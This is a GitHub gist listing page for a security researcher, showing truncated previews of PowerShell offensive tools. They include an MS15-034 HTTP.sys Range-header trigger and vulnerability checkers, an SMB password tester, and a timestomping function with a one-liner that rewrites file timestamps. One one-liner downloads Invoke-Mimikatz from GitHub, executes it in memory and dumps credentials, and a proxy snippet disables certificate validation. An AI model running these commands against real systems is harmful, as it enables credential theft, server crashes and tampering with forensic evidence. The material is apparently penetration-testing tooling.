Chris Campbell obscuresec
obscuresec
/ ms15-034.cmd
Created
April 15, 2015 18:14
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell -com {$wr=[Net.WebRequest]::Create('http://127.0.0.1/iisstart.htm');$wr.AddRange('bytes',18,18446744073709551615);$wr.GetResponse();$wr.close()} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # define and encode test data | |
| $TestString = 'This is a test. A short test for encoding and padding.' | |
| $Encoded = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($TestString)) | |
| # insert random '=' | |
| $Length = $Encoded.Length | |
| $RandomChar = 1..($Length - 3) | Get-Random | |
| $Encoded = $Encoded.Insert($RandomChar,'=') | |
| # strip out '=' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Test-MS15034($url) { | |
| try { | |
| $wr = [Net.WebRequest]::Create($url) | |
| $wr.AddRange('bytes',18,18446744073709551615) | |
| $res = $wr.GetResponse() | |
| $status = $res.statuscode | |
| Write-Output "$status means it is not vulnerable" | |
| $res.Close() | |
| }catch { | |
| if ($Error[0].Exception.InnerException.Response.StatusCode -eq '416') {Write-Output "Site is vulnerable"} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Test-MS15034($url) { | |
| try { | |
| $wr = [Net.WebRequest]::Create($url) | |
| $wr.AddRange('bytes',234234,28768768) | |
| $res = $wr.GetResponse() | |
| $status = $res.statuscode | |
| Write-Output "$status means it is not vulnerable" | |
| $res.Close() | |
| }catch { | |
| if ($Error[0].Exception.InnerException.Response.StatusCode -eq '416') {Write-Output "Site is vulnerable"} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Function Get-SubnetResolution { | |
| $Subnet = '74.125.228' #change this | |
| $Wait = 2 #Seconds to wait between resolution | |
| $HostRangeLow = 1 | |
| $HostRangeHigh = 10 | |
| $Range = $HostRangeLow..$HostRangeHigh | |
| #Instantiate once | |
| $DnsObject = [Net.DNS] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Test-SmbPassword { | |
| <# | |
| .SYNOPSIS | |
| Tests a username and password to see if it is valid against a remote machine or domain. | |
| Author: Chris Campbell (@obscuresec) | |
| License: BSD 3-Clause | |
| Required Dependencies: None | |
| Optional Dependencies: None |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $wc=new-object net.webclient | |
| $im=$wc.downloadstring('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1') | |
| iex $im | |
| invoke-mimikatz -DumpCreds |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Set-MacAttribute { | |
| <# | |
| .SYNOPSIS | |
| Sets the modified, accessed and created (Mac) attributes for a file based on another file or input. | |
| PowerSploit Function: Set-MacAttribute | |
| Author: Chris Campbell (@obscuresec) | |
| License: BSD 3-Clause | |
| Required Dependencies: None |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| PowerShell.exe -com {$file=(gi c:\demo\test.txt);$date='01/03/2006 12:12 pm';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #simple and dirty proxy | |
| #usage: http://127.0.0.1:8000/?url=http://www.obscuresec.com | |
| $Up = "http://+:8000/" | |
| $Hso = New-Object Net.HttpListener | |
| $Wco = New-Object Net.Webclient | |
| #ignore self-signed/invalid ssl certs | |
| [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$True} | |
| Foreach ($P in $Up) {$Hso.Prefixes.Add($P)} |
NewerOlder